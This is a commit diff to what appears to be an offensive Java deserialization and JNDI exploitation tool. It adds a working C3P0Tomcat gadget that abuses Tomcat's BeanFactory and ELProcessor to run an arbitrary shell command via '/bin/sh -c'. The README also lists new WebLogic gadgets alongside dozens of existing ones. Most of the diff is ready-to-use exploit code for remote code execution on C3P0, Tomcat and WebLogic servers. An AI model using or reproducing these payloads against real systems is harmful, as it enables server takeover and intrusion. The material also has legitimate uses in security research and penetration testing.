add c0p3tomcat

add c0p3tomcat
fix c0p3 warning info

Author: cckuailong

README.md

@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 55)
+#### 3. Deserailization Gadget (total: 58)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -44,6 +44,7 @@ payload | author | dependencies
 AspectJWeaver       |@Jang                       |aspectjweaver:1.9.2, commons-collections:3.2.2
 BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
 C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
+C3P0Tomcat          |@yulegeyu                   |tomcat, com.mchange:c3p0:0.9.5.2, com.mchange:mchange-commons-java:0.2.11
 Click1              |@artsploit                  |click-nodeps:2.3.0, javax.servlet-api:3.1.0
 Clojure             |@JackOfMostTrades           |clojure:1.8.0
 Coherence1 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
@@ -94,6 +95,8 @@ Weblogic2 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0,
 Weblogic3 :arrow_up:           |@cckuailong                 |com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
 Weblogic4 :arrow_up:           |@cckuailong                 |weblogic.common.internal.WLObjectOutputStream
 Weblogic5 :arrow_up:           |@cckuailong                 |weblogic:12.2.1.4, coherence
+Weblogic6 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
+Weblogic7 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 WildFly1 :arrow_up:            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 

src/main/java/payloads/C3P0Tomcat.java

@@ -0,0 +1,77 @@
+package payloads;
+
+
+import com.mchange.v2.c3p0.PoolBackedDataSource;
+import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
+import org.apache.naming.ResourceRef;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+import util.Reflections;
+
+import javax.naming.NamingException;
+import javax.naming.Reference;
+import javax.naming.Referenceable;
+import javax.naming.StringRefAddr;
+import javax.sql.ConnectionPoolDataSource;
+import javax.sql.PooledConnection;
+import java.io.PrintWriter;
+import java.sql.SQLException;
+import java.sql.SQLFeatureNotSupportedException;
+import java.util.logging.Logger;
+
+
+/**
+ *
+ * @author yulegeyu
+ *
+ */
+@Dependencies( { "tomcat", "com.mchange:c3p0:0.9.5.2", "com.mchange:mchange-commons-java:0.2.11"} )
+@Authors({ Authors.YULEGEYU })
+public class C3P0Tomcat implements ObjectPayload<Object> {
+    public Object getObject ( String command ) throws Exception {
+
+        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
+        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null, command));
+        return b;
+    }
+
+    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
+
+        private String className;
+        private String url;
+        private String command;
+
+        public PoolSource ( String className, String url, String command ) {
+            this.className = className;
+            this.url = url;
+            this.command = command;
+        }
+
+        public Reference getReference () throws NamingException {
+            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
+            ref.add(new StringRefAddr("forceString", "x=eval"));
+            String cmd = this.command;
+            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','"+ cmd +"']).start()\")"));
+            return ref;
+        }
+
+        public PrintWriter getLogWriter () throws SQLException {return null;}
+        public void setLogWriter ( PrintWriter out ) throws SQLException {}
+        public void setLoginTimeout ( int seconds ) throws SQLException {}
+        public int getLoginTimeout () throws SQLException {return 0;}
+        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
+        public PooledConnection getPooledConnection () throws SQLException {return null;}
+        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
+
+    }
+
+    public static byte[] getBytes ( final String command ) throws Exception {
+        return PayloadRunner.run(C3P0Tomcat.class, command);
+    }
+
+    public static void main ( final String command ) throws Exception {
+        PayloadRunner.run(C3P0Tomcat.class, command);
+    }
+
+}

src/main/java/payloads/annotation/Authors.java

@@ -28,6 +28,7 @@
     String HUGOW = "hugow";
     String FIREBASKY = "Firebasky";
     String CCKUAILONG = "cckuailong";
+    String YULEGEYU = "yulegeyu";
 
     String[] value() default {};
 

src/main/java/run/ServerStart.java

@@ -8,6 +8,7 @@
 import org.apache.commons.cli.*;
 import org.apache.commons.codec.binary.Hex;
 import org.apache.commons.lang3.StringUtils;
+import org.apache.log4j.BasicConfigurator;
 import org.apache.sshd.common.util.io.NullPrintStream;
 import payloads.ObjectPayload;
 import payloads.annotation.Authors;

src/main/resources/log4j.properties

@@ -0,0 +1,4 @@
+log4j.rootLogger=ERROR, stdout
+log4j.appender.stdout=org.apache.log4j.ConsoleAppender
+log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
+log4j.appender.stdout.layout.ConversionPattern=%d %p [%c] - %m%n